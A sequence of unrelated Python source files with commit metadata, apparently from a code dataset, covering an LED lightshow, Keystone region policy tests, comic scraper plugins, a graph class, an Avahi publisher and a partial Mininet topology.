parser.add_argument('--api-key', required=True, help='API key for the UpGuard instance')
parser.add_argument('--secret-key', required=True, help='Secret key for the UpGuard instance')
# Boolean flag: absent -> False, present -> True.
parser.add_argument('--insecure', action='store_true', help='Ignore SSL certificate checks')
# NOTE: parses sys.argv at import time; the required flags make a bare
# import of this snippet exit with an error unless they are supplied.
args = parser.parse_args()
| mit | Python |
|
8bdc9c0685500b822787779b5ebffa46b00d8138 | Add script | Antidisestablishmentarianism/lightshow | lightshow.py | lightshow.py | #!/usr/bin/sudo / usr/bin/python
import RPi.GPIO as GPIO
from time import sleep

GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)

# PWM channel triples (red, green, blue) per LED strip, keyed by location.
leds = {'floor': [], 'top-left': []}


def setupled(name, pins):
    """Configure three board pins as outputs and attach 100 Hz PWM channels."""
    for i in range(0, 3):
        GPIO.setup(pins[i], GPIO.OUT)
        leds[name].append(GPIO.PWM(pins[i], 100))


setupled('floor', [11, 13, 15])
setupled('top-left', [12, 16, 18])

for key, value in leds.items():
    for i in value:
        i.start(0)

WHITE = [255, 255, 255]
BLACK = [0, 0, 0]
RED = [255, 0, 0]
GREEN = [0, 255, 0]
BLUE = [0, 0, 255]
YELLOW = [255, 255, 0]
PURPLE = [255, 0, 255]
CYAN = [0, 255, 255]


def setcolor(led, color):
    """Drive one RGB LED to `color`; duty cycle is inverted (common anode)."""
    for i in range(0, 3):
        leds[led][i].ChangeDutyCycle((255 - color[i]) * 100 / 255)
    print('Setting {} to {}'.format(led, color))


# Start program here
try:
    while True:
        setcolor('floor', RED)
        sleep(1)
        setcolor('top-left', GREEN)
        sleep(1)
        setcolor('floor', BLUE)
        sleep(1)
        setcolor('top-left', YELLOW)
        sleep(1)
        setcolor('floor', PURPLE)
        sleep(1)
        setcolor('top-left', CYAN)
        sleep(1)
        setcolor('floor', WHITE)
        sleep(1)
        setcolor('top-left', BLACK)
        sleep(1)
        # Fade floor up, then top-left down, through greyscale.
        for i in range(0, 256):
            setcolor('floor', [i, i, i])
            sleep(0.01)
        for x in range(0, 256):
            y = 255 - x
            setcolor('top-left', [y, y, y])
            sleep(0.01)
except KeyboardInterrupt:
    # BUG FIX: the shutdown code below was unreachable (infinite loop with
    # no exit) and iterated over an undefined name `rooms`.  Ctrl-C now
    # falls through to an orderly stop of the `leds` PWM channels.
    pass

for key, value in leds.items():
    for i in value:
        i.stop()

GPIO.cleanup()
| mit | Python |
|
1a4052deb8e0ab2deb7038220ae23d7bb9311ce9 | Add initial version of the script | agarstang/vmware-ofv-to-facter | ovf_to_facter.py | ovf_to_facter.py | #!/usr/bin/python
#stdlib
import json
import os
import subprocess
from xml.dom.minidom import parseString
def which(cmd):
"""Python implementation of `which` command."""
for path in os.environ["PATH"].split(os.pathsep):
file = os.path.join(path, cmd)
if os.path.exists(file) and os.access(file, os.X_OK):
return file
elif os.name == "nt":
for ext in os.environ["PATHEXT"].split(os.pathsep):
full = file + ext
if os.path.exists(full) and os.access(full, os.X_OK):
return full
return None
FACTER = which("facter")
VMTOOLS = which("vmtoolsd")
def facter(*args):
facts = json.loads(subprocess.check_output([FACTER, '--json', '--no-external'] + [ arg for arg in args ]))
return facts
def findXmlSection(dom, sectionName):
sections = dom.getElementsByTagName(sectionName)
return sections[0]
def getOVFProperties(ovfEnv):
dom = parseString(ovfEnv)
section = findXmlSection(dom, "PropertySection")
propertyMap = {}
for property in section.getElementsByTagName("Property"):
key = property.getAttribute("oe:key")
value = property.getAttribute("oe:value")
propertyMap[key] = value
dom.unlink()
return propertyMap
def getVMWareOvfEnv():
if VMTOOLS == None:
raise Exception("VMWare Tools not installed.")
try:
ovf = subprocess.check_output([VMTOOLS, '--cmd', 'info-get guestinfo.ovfenv'], stderr=subprocess.STDOUT)
properties = getOVFProperties(ovf)
print "ovf=true"
for key, value in properties.iteritems():
print "ovf_" + key + "=" + value
except:
print "ovf=false"
return
if __name__ == "__main__":
facts = facter("is_virtual", "virtual")
if (facts['is_virtual'] == 'true') and (facts['virtual'] == 'vmware'):
getVMWareOvfEnv()
| mit | Python |
|
2f0ba9368bc44cffce1dcf2ec483aabf04c2e127 | add python #5 | ryanbmilbourne/euler,ryanbmilbourne/euler | python/5.py | python/5.py | #!/usr/bin/env python
'''
Problem
=======
2520 is the smallest number that can be divided by each of the numbers from 1 to 10
without any remainder. What is the smallest positive number that is evenly divisible
by all of the numbers from 1 to 20?
Latest Run Stats
====== === =====
'''
from math import ceil
from math import sqrt
from functools import reduce  # `reduce` is no longer a builtin on Python 3


def primeSieve(num):
    """Return the set of primes below `num` (sieve of Eratosthenes)."""
    noprimes = {j for i in range(2, int(ceil(sqrt(num)))) for j in range(i*2, num, i)}
    return {i for i in range(2, num) if i not in noprimes}


def anyDivisible(nums, divisor):
    """True if any element of `nums` is divisible by `divisor`."""
    for i in nums:
        if i % divisor == 0:
            return True
    return False


limit = 20  # upper limit for divisors
divisors = range(2, limit+1)
primes = primeSieve(max(divisors))
primeFactors = []

# Use a LCM table to determine the prime factors that make up the solution:
# repeatedly divide each prime out of the divisor list; every pass that
# removes a factor contributes one copy of the prime to the LCM.
for prime in primes:
    if divisors == []:
        break
    while True:
        divisible = anyDivisible(divisors, prime)
        if not divisible:
            break
        # Floor division keeps the values ints on Python 3 as well
        # (they divide exactly here, but `/` would yield floats).
        divisors = [i if i % prime != 0 else i//prime for i in divisors]
        divisors = [i for i in divisors if i > 1]
        primeFactors.append(prime)

answer = reduce(lambda primeFactor, total: primeFactor*total, primeFactors)
print(answer)  # should be only print statement
| mit | Python |
|
fdf8cb1f0420eef27592d32f2e10066482304314 | Add region protection tests for system readers | openstack/keystone,openstack/keystone,mahak/keystone,mahak/keystone,openstack/keystone,mahak/keystone | keystone/tests/unit/protection/v3/test_regions.py | keystone/tests/unit/protection/v3/test_regions.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from six.moves import http_client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _UserRegionTests(object):
    """Common default functionality for all users."""

    def test_user_can_get_a_region(self):
        ref = PROVIDERS.catalog_api.create_region(unit.new_region_ref())

        with self.test_client() as c:
            c.get('/v3/regions/%s' % ref['id'], headers=self.headers)

    def test_user_can_list_regions(self):
        # Seed two regions and verify everything listed is one of them.
        expected = [
            PROVIDERS.catalog_api.create_region(unit.new_region_ref())['id']
            for _ in range(2)
        ]

        with self.test_client() as c:
            r = c.get('/v3/regions', headers=self.headers)
            for region in r.json['regions']:
                self.assertIn(region['id'], expected)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
                        common_auth.AuthTestMixin,
                        _UserRegionTests):
    """System-reader persona: may read regions but never mutate them."""

    def setUp(self):
        super(SystemReaderTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        # Enforce scoped policy so system-scope rules actually apply.
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        # Create a user and grant them the reader role on the system.
        system_reader = unit.new_user_ref(
            domain_id=CONF.identity.default_domain_id
        )
        self.user_id = PROVIDERS.identity_api.create_user(
            system_reader
        )['id']
        PROVIDERS.assignment_api.create_system_grant_for_user(
            self.user_id, self.bootstrapper.reader_role_id
        )

        auth = self.build_authentication_request(
            user_id=self.user_id, password=system_reader['password'],
            system=True
        )

        # Grab a token using the persona we're testing and prepare headers
        # for requests we'll be making in the tests.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}

    def test_user_cannot_create_regions(self):
        create = {'region': {'description': uuid.uuid4().hex}}

        with self.test_client() as c:
            c.post(
                '/v3/regions', json=create, headers=self.headers,
                expected_status_code=http_client.FORBIDDEN
            )

    def test_user_cannot_update_regions(self):
        region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())

        with self.test_client() as c:
            update = {'region': {'description': uuid.uuid4().hex}}
            c.patch(
                '/v3/regions/%s' % region['id'], json=update,
                headers=self.headers,
                expected_status_code=http_client.FORBIDDEN
            )

    def test_user_cannot_delete_regions(self):
        region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())

        with self.test_client() as c:
            c.delete(
                '/v3/regions/%s' % region['id'],
                headers=self.headers,
                expected_status_code=http_client.FORBIDDEN
            )
| apache-2.0 | Python |
|
459f87be465e0f5554c708fe60679494d152c8fd | Create permissions.py | dfurtado/generator-djangospa,dfurtado/generator-djangospa,dfurtado/generator-djangospa | templates/root/main/permissions.py | templates/root/main/permissions.py | from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
    """
    Custom permission to only allow owners of an object to edit it.
    """

    def has_object_permission(self, request, view, obj):
        # BUG FIX: the hook DRF invokes is `has_object_permission`
        # (singular).  The original `has_object_permissions` was never
        # called, so BasePermission's default allowed every request.

        # Read permissions are allowed to any request,
        # so we'll always allow GET, HEAD, or OPTIONS requests.
        if request.method in permissions.SAFE_METHODS:
            return True

        # Write permissions are only allowed to the owner of the object.
        return obj.owner == request.user
| mit | Python |
|
4a98686b63563b209456a8933ef34477adcdae43 | extend Phabricator class and do nothing | TidalLabs/py-phabricate | phabricate/phab.py | phabricate/phab.py | from phabricator import Phabricator as _Phabricator
class Phabricator(_Phabricator):
pass
| bsd-3-clause | Python |
|
cca6b0c28747a3b0307fccd33dee60fcb42d910d | Test Fix. | leoc/home-assistant,JshWright/home-assistant,fbradyirl/home-assistant,kennedyshead/home-assistant,emilhetty/home-assistant,aequitas/home-assistant,happyleavesaoc/home-assistant,jabesq/home-assistant,keerts/home-assistant,Cinntax/home-assistant,deisi/home-assistant,kyvinh/home-assistant,devdelay/home-assistant,jamespcole/home-assistant,adrienbrault/home-assistant,alexmogavero/home-assistant,deisi/home-assistant,varunr047/homefile,jnewland/home-assistant,mikaelboman/home-assistant,rohitranjan1991/home-assistant,Duoxilian/home-assistant,PetePriority/home-assistant,miniconfig/home-assistant,sdague/home-assistant,srcLurker/home-assistant,keerts/home-assistant,leoc/home-assistant,auduny/home-assistant,mikaelboman/home-assistant,ma314smith/home-assistant,LinuxChristian/home-assistant,alexmogavero/home-assistant,bdfoster/blumate,deisi/home-assistant,ct-23/home-assistant,morphis/home-assistant,oandrew/home-assistant,tchellomello/home-assistant,srcLurker/home-assistant,devdelay/home-assistant,PetePriority/home-assistant,GenericStudent/home-assistant,emilhetty/home-assistant,morphis/home-assistant,JshWright/home-assistant,coteyr/home-assistant,JshWright/home-assistant,rohitranjan1991/home-assistant,hmronline/home-assistant,shaftoe/home-assistant,postlund/home-assistant,nugget/home-assistant,mKeRix/home-assistant,MungoRae/home-assistant,mezz64/home-assistant,postlund/home-assistant,jawilson/home-assistant,happyleavesaoc/home-assistant,home-assistant/home-assistant,hmronline/home-assistant,kyvinh/home-assistant,Duoxilian/home-assistant,robbiet480/home-assistant,stefan-jonasson/home-assistant,joopert/home-assistant,luxus/home-assistant,ma314smith/home-assistant,happyleavesaoc/home-assistant,dmeulen/home-assistant,tboyce1/home-assistant,robjohnson189/home-assistant,Danielhiversen/home-assistant,mKeRix/home-assistant,Duoxilian/home-assistant,emilhetty/home-assistant,open-homeautomation/home-assistant,philipbl/home-assistant,min
iconfig/home-assistant,shaftoe/home-assistant,dmeulen/home-assistant,Teagan42/home-assistant,w1ll1am23/home-assistant,aoakeson/home-assistant,stefan-jonasson/home-assistant,philipbl/home-assistant,adrienbrault/home-assistant,emilhetty/home-assistant,bdfoster/blumate,eagleamon/home-assistant,LinuxChristian/home-assistant,jaharkes/home-assistant,sdague/home-assistant,leoc/home-assistant,kyvinh/home-assistant,pschmitt/home-assistant,w1ll1am23/home-assistant,nkgilley/home-assistant,Teagan42/home-assistant,ct-23/home-assistant,leppa/home-assistant,MartinHjelmare/home-assistant,HydrelioxGitHub/home-assistant,aronsky/home-assistant,tboyce1/home-assistant,turbokongen/home-assistant,rohitranjan1991/home-assistant,shaftoe/home-assistant,stefan-jonasson/home-assistant,DavidLP/home-assistant,xifle/home-assistant,MungoRae/home-assistant,instantchow/home-assistant,ma314smith/home-assistant,hexxter/home-assistant,soldag/home-assistant,FreekingDean/home-assistant,oandrew/home-assistant,betrisey/home-assistant,DavidLP/home-assistant,mKeRix/home-assistant,coteyr/home-assistant,hmronline/home-assistant,sffjunkie/home-assistant,devdelay/home-assistant,MungoRae/home-assistant,ewandor/home-assistant,Julian/home-assistant,alexmogavero/home-assistant,Zyell/home-assistant,bdfoster/blumate,molobrakos/home-assistant,Zac-HD/home-assistant,keerts/home-assistant,qedi-r/home-assistant,hexxter/home-assistant,mKeRix/home-assistant,justyns/home-assistant,open-homeautomation/home-assistant,Danielhiversen/home-assistant,florianholzapfel/home-assistant,srcLurker/home-assistant,soldag/home-assistant,ct-23/home-assistant,partofthething/home-assistant,home-assistant/home-assistant,eagleamon/home-assistant,MartinHjelmare/home-assistant,toddeye/home-assistant,nugget/home-assistant,jaharkes/home-assistant,Smart-Torvy/torvy-home-assistant,leoc/home-assistant,varunr047/homefile,leppa/home-assistant,aoakeson/home-assistant,toddeye/home-assistant,xifle/home-assistant,justyns/home-assistant,nugget/home-assistant,
jabesq/home-assistant,ewandor/home-assistant,tchellomello/home-assistant,xifle/home-assistant,philipbl/home-assistant,instantchow/home-assistant,titilambert/home-assistant,tinloaf/home-assistant,coteyr/home-assistant,nnic/home-assistant,oandrew/home-assistant,miniconfig/home-assistant,kennedyshead/home-assistant,persandstrom/home-assistant,sffjunkie/home-assistant,keerts/home-assistant,balloob/home-assistant,jnewland/home-assistant,Julian/home-assistant,jawilson/home-assistant,LinuxChristian/home-assistant,fbradyirl/home-assistant,bdfoster/blumate,aoakeson/home-assistant,shaftoe/home-assistant,nkgilley/home-assistant,philipbl/home-assistant,jnewland/home-assistant,pschmitt/home-assistant,ct-23/home-assistant,Zac-HD/home-assistant,alexmogavero/home-assistant,dmeulen/home-assistant,FreekingDean/home-assistant,ewandor/home-assistant,qedi-r/home-assistant,GenericStudent/home-assistant,persandstrom/home-assistant,oandrew/home-assistant,nnic/home-assistant,robbiet480/home-assistant,joopert/home-assistant,stefan-jonasson/home-assistant,Julian/home-assistant,robjohnson189/home-assistant,varunr047/homefile,emilhetty/home-assistant,aequitas/home-assistant,fbradyirl/home-assistant,open-homeautomation/home-assistant,mikaelboman/home-assistant,sander76/home-assistant,happyleavesaoc/home-assistant,morphis/home-assistant,jaharkes/home-assistant,LinuxChristian/home-assistant,molobrakos/home-assistant,Duoxilian/home-assistant,aequitas/home-assistant,Zac-HD/home-assistant,instantchow/home-assistant,florianholzapfel/home-assistant,lukas-hetzenecker/home-assistant,auduny/home-assistant,MartinHjelmare/home-assistant,auduny/home-assistant,kyvinh/home-assistant,jamespcole/home-assistant,hmronline/home-assistant,varunr047/homefile,jabesq/home-assistant,mezz64/home-assistant,florianholzapfel/home-assistant,Cinntax/home-assistant,DavidLP/home-assistant,morphis/home-assistant,luxus/home-assistant,molobrakos/home-assistant,hmronline/home-assistant,xifle/home-assistant,Smart-Torvy/torvy-home-as
sistant,deisi/home-assistant,sander76/home-assistant,betrisey/home-assistant,balloob/home-assistant,Julian/home-assistant,tboyce021/home-assistant,tboyce1/home-assistant,ma314smith/home-assistant,eagleamon/home-assistant,miniconfig/home-assistant,sffjunkie/home-assistant,dmeulen/home-assistant,HydrelioxGitHub/home-assistant,MungoRae/home-assistant,robjohnson189/home-assistant,HydrelioxGitHub/home-assistant,tinloaf/home-assistant,deisi/home-assistant,PetePriority/home-assistant,mikaelboman/home-assistant,betrisey/home-assistant,jaharkes/home-assistant,eagleamon/home-assistant,bdfoster/blumate,srcLurker/home-assistant,sffjunkie/home-assistant,varunr047/homefile,sffjunkie/home-assistant,persandstrom/home-assistant,betrisey/home-assistant,justyns/home-assistant,MungoRae/home-assistant,florianholzapfel/home-assistant,nnic/home-assistant,hexxter/home-assistant,devdelay/home-assistant,Smart-Torvy/torvy-home-assistant,Zac-HD/home-assistant,tboyce1/home-assistant,robjohnson189/home-assistant,titilambert/home-assistant,balloob/home-assistant,lukas-hetzenecker/home-assistant,luxus/home-assistant,partofthething/home-assistant,Zyell/home-assistant,LinuxChristian/home-assistant,ct-23/home-assistant,JshWright/home-assistant,tboyce021/home-assistant,tinloaf/home-assistant,Smart-Torvy/torvy-home-assistant,jamespcole/home-assistant,aronsky/home-assistant,turbokongen/home-assistant,open-homeautomation/home-assistant,mikaelboman/home-assistant,hexxter/home-assistant,Zyell/home-assistant | tests/components/garage_door/test_demo.py | tests/components/garage_door/test_demo.py | """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, RIGHT))
| """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, RIGHT))
| mit | Python |
67d0d381003dc02d5e1eae9d0c8591daee4b93b3 | Migrate SnafuComics to single-class module. | webcomics/dosage,blade2005/dosage,peterjanes/dosage,peterjanes/dosage,webcomics/dosage,blade2005/dosage | dosagelib/plugins/snafu.py | dosagelib/plugins/snafu.py | # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name, path):
super(Snafu, self).__init__('SnafuComics/' + name)
self.url = 'http://snafu-comics.com/swmseries/' + path
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@classmethod
def getmodules(cls):
return [
cls('Braindead', 'braindead'),
cls('Bunnywith', 'bunnywith'),
cls('DeliverUsEvil', 'deliverusevil'),
cls('EA', 'ea'),
cls('FT', 'ft'),
cls('GrimTalesFromDownBelow', 'grimtales'),
cls('KOF', 'kof'),
cls('MyPanda', 'mypanda'),
cls('NarutoHeroesPath', 'naruto'),
cls('NewSuperMarioAdventures', 'nsma'),
cls('PowerPuffGirls', 'powerpuffgirls'),
# cls('PSG2', 'psg2'), -- Strangely broken
cls('SatansExcrement', 'satansexcrement'),
cls('SF', 'sf'),
cls('SkullBoy', 'skullboy'),
cls('Snafu', 'snafu'),
cls('Soul', 'soul'),
cls('Sugar', 'sugarbits'),
cls('SureToBeBanD', 'stbb'),
cls('TheLeague', 'league'),
cls('Tin', 'tin'),
cls('Titan', 'titan'),
cls('TrunksAndSoto', 'trunks-and-soto'),
cls('TW', 'tw'),
cls('Zim', 'zim'),
]
| # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class _Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name):
super(_Snafu, self).__init__('SnafuComics/' + name)
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@property
def url(self):
return 'http://snafu-comics.com/swmseries/' + self.path
class Braindead(_Snafu):
path = 'braindead'
class Bunnywith(_Snafu):
path = 'bunnywith'
class DeliverUsEvil(_Snafu):
path = 'deliverusevil'
class DigitalPurgatory(_Snafu):
path = 'digital-purgatory'
class EA(_Snafu):
path = 'ea'
class FT(_Snafu):
path = 'ft'
class GrimTalesFromDownBelow(_Snafu):
path = 'grimtales'
class KOF(_Snafu):
path = 'kof'
class MyPanda(_Snafu):
path = 'mypanda'
class NarutoHeroesPath(_Snafu):
path = 'naruto'
class NewSuperMarioAdventures(_Snafu):
path = 'nsma'
class PowerPuffGirls(_Snafu):
path = 'powerpuffgirls'
class PSG2(_Snafu):
path = 'psg2'
class SatansExcrement(_Snafu):
path = 'satansexcrement'
class SF(_Snafu):
path = 'sf'
class SkullBoy(_Snafu):
path = 'skullboy'
class Snafu(_Snafu):
path = 'snafu'
class Soul(_Snafu):
path = 'soul'
class Sugar(_Snafu):
path = 'sugarbits'
class SureToBeBanD(_Snafu):
path = 'stbb'
class TheLeague(_Snafu):
path = 'league'
class Tin(_Snafu):
path = 'tin'
class Titan(_Snafu):
path = 'titan'
class TrunksAndSoto(_Snafu):
path = 'trunks-and-soto'
class TW(_Snafu):
path = 'tw'
class Zim(_Snafu):
path = 'zim'
| mit | Python |
43cf23e793794fd45322471a52c83785070ac243 | add simple_graph | ndraper2/data-structures,SakiFu/data-structures | simple_graph.py | simple_graph.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
class Graph(object):
def __init__(self):
self.gdict = {}
def nodes(self):
return self.gdict.keys()
def edges(self):
self.edges = []
for node in self.gdict:
for end in self.gdict[node]:
self.edges.append((node, end))
return self.edges
def add_node(self, n):
self.gdict.setdefault(n, [])
def add_edge(self, n1, n2):
self.gdict[n1].setdefault(n2, [])
try:
self.gdict[n1].append(n2)
except KeyError:
self.gdict[n1] = [n2]
def del_node(self, n):
try:
del self.gdict[n1]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
for nodelist in self.gdit.values():
try:
nodelist.remove(n)
except ValueError:
continue
def del_edge(self, n1, n2):
try:
self.gdict[n1].remove[n2]
except KeyError, ValueError:
raise ValueError('Edge {}, {} not in the graph.'.format(n1, n2))
def has_node(self, n):
return n in self.gdict
def neighbors(self, n):
try:
return self.gdict[n]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
def adjacent(self, n1, n2):
if n1 not in self.dict or n2 not in self.gdict:
raise KeyError('One of these nodes is not in the graph.')
return n2 in self.gdict[n1]
| mit | Python |
|
7d9b004b3fb33ed9f16ca657ddb6ee3ddf452802 | add dump2pe (t2_08 sample) | LRGH/elfesteem,LRGH/elfesteem | elfesteem/t2_08_dump2pe.py | elfesteem/t2_08_dump2pe.py | #! /usr/bin/env python
import pe
from pe_init import PE
import rlcompleter,readline,pdb, sys
from pprint import pprint as pp
readline.parse_and_bind("tab: complete")
import shlex
f = open('my_dump.txt', 'r')
for i in xrange(27):
f.readline()
state = 0
funcs = []
dll = ""
#parse imprec output
new_dll = []
while True:
l = f.readline()
if not l:
break
l = l.strip()
if state == 0 and l.startswith("FThunk"):
t = [r for r in shlex.shlex(l)]
ad = int(t[2], 16)
state = 1
continue
if state == 1:
t = [r for r in shlex.shlex(l)]
if not len(t):
new_dll.append(({"name":dll,
"firstthunk":ad},funcs[:] ))
dll = ""
funcs, state = [], 0
else:
dll = t[2]
funcs.append(t[6])
continue
pp(new_dll)
data = open('DUMP_00401000-00479000', 'rb').read()
e = PE()
e.DirImport.add_dlldesc(new_dll)
s_text = e.SHList.add_section(name = "text", addr = 0x1000, data = data)
s_myimp = e.SHList.add_section(name = "myimp", rawsize = len(e.DirImport))
e.DirImport.set_rva(s_myimp.addr)
e.Opthdr.Opthdr.AddressOfEntryPoint = s_text.addr
open('uu.bin', 'wb').write(str(e))
| lgpl-2.1 | Python |
|
0881e326a604977bcaf385db152a96826db52b74 | Add class for publishing a service on avahi | wizbit-archive/wizbit,wizbit-archive/wizbit | wizd/publish.py | wizd/publish.py | import dbus
import gobject
import avahi
import threading
import sys
from dbus.mainloop.glib import DBusGMainLoop
"""
Class for publishing a service on DNS-SD using Avahi.
Creates a thread to handle requests
"""
class ServicePublisher (threading.Thread):
def __init__(self, name, type, port, txt = "", domain = "", host = ""):
threading.Thread.__init__(self)
gobject.threads_init()
self._name = name
self._type = type
self._port = port
self._txt = txt
self._domain = ""
self._host = ""
self._group = None
self._rename_count = 12 # Counter so we only rename after collisions a sensible number of times
def run(self):
DBusGMainLoop( set_as_default=True )
self._main_loop = gobject.MainLoop()
self._bus = dbus.SystemBus()
self._server = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, avahi.DBUS_PATH_SERVER ),
avahi.DBUS_INTERFACE_SERVER )
self._server.connect_to_signal( "StateChanged", self._server_state_changed )
self._server_state_changed( self._server.GetState() )
self._main_loop.run()
if not self._group is None:
self._group.Free()
def stop(self):
self._main_loop.quit()
def _add_service(self):
if self._group is None:
self._group = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, self._server.EntryGroupNew()),
avahi.DBUS_INTERFACE_ENTRY_GROUP)
self._group.connect_to_signal('StateChanged', self._entry_group_state_changed)
print "Adding service '%s' of type '%s' ..." % (self._name, self._type)
self._group.AddService(
avahi.IF_UNSPEC, #interface
avahi.PROTO_UNSPEC, #protocol
0, #flags
self._name, self._type,
self._domain, self._host,
dbus.UInt16(self._port),
avahi.string_array_to_txt_array(self._txt))
self._group.Commit()
def _remove_service(self):
if not self._group is None:
self._group.Reset()
def _server_state_changed(self, state):
if state == avahi.SERVER_COLLISION:
print "WARNING: Server name collision"
self._remove_service()
elif state == avahi.SERVER_RUNNING:
self._add_service()
def _entry_group_state_changed(self, state, error):
print "state change: %i" % state
if state == avahi.ENTRY_GROUP_ESTABLISHED:
print "Service established."
elif state == avahi.ENTRY_GROUP_COLLISION:
self._rename_count = self._rename_count - 1
if rename_count > 0:
name = server.GetAlternativeServiceName(name)
print "WARNING: Service name collision, changing name to '%s' ..." % name
self._remove_service()
self._add_service()
else:
print "ERROR: No suitable service name found after %i retries, exiting." % n_rename
self._main_loop.quit()
elif state == avahi.ENTRY_GROUP_FAILURE:
print "Error in group state changed", error
self._main_loop.quit()
return
if __name__ == "__main__":
sp = ServicePublisher("test","_test._tcp",1234)
sp.start()
chr = sys.stdin.read(1)
sp.stop()
| lgpl-2.1 | Python |
|
062b4d045580adaebf30376cae1b88387dc7f3bb | add test_db | xu6148152/WebApp-Python,xu6148152/WebApp-Python,xu6148152/WebApp-Python | www/test_deb.py | www/test_deb.py | # coding=utf-8
from www.models import User
from www.transwarp import db
__author__ = 'xubinggui'
db.create_engine(user='www-data', password='www-data', database='awesome')
u = User(name='Test', email='test@example.com', password='1234567890', image='about:blank')
u.insert()
print 'new user id:', u.id
u1 = User.find_first('where email=?', 'test@example.com')
print 'find user\'s name:', u1.name
u1.delete()
u2 = User.find_first('where email=?', 'test@example.com')
print 'find user:', u2 | mit | Python |
|
64c24ee2813e5d85866d14cfdee8258b91c09df6 | add debug topology file | bolshoibooze/hone,bolshoibooze/hone,pupeng/hone,bolshoibooze/hone,bolshoibooze/hone,pupeng/hone,pupeng/hone,pupeng/hone | evaluation/topo-fattree.py | evaluation/topo-fattree.py | """Custom topology example
Two directly connected switches plus a host for each switch:
host --- switch --- switch --- host
Adding the 'topos' dict with a key/value pair to generate our newly defined
topology enables one to pass in '--topo=mytopo' from the command line.
"""
from mininet.topo import Topo
class MyTopo( Topo ):
"Simple topology example."
def __init__( self ):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
host1 = self.addHost('h1')
host2 = self.addHost('h2')
host3 = self.addHost('h3')
host4 = self.addHost('h4')
host5 = self.addHost('h5')
host6 = self.addHost('h6')
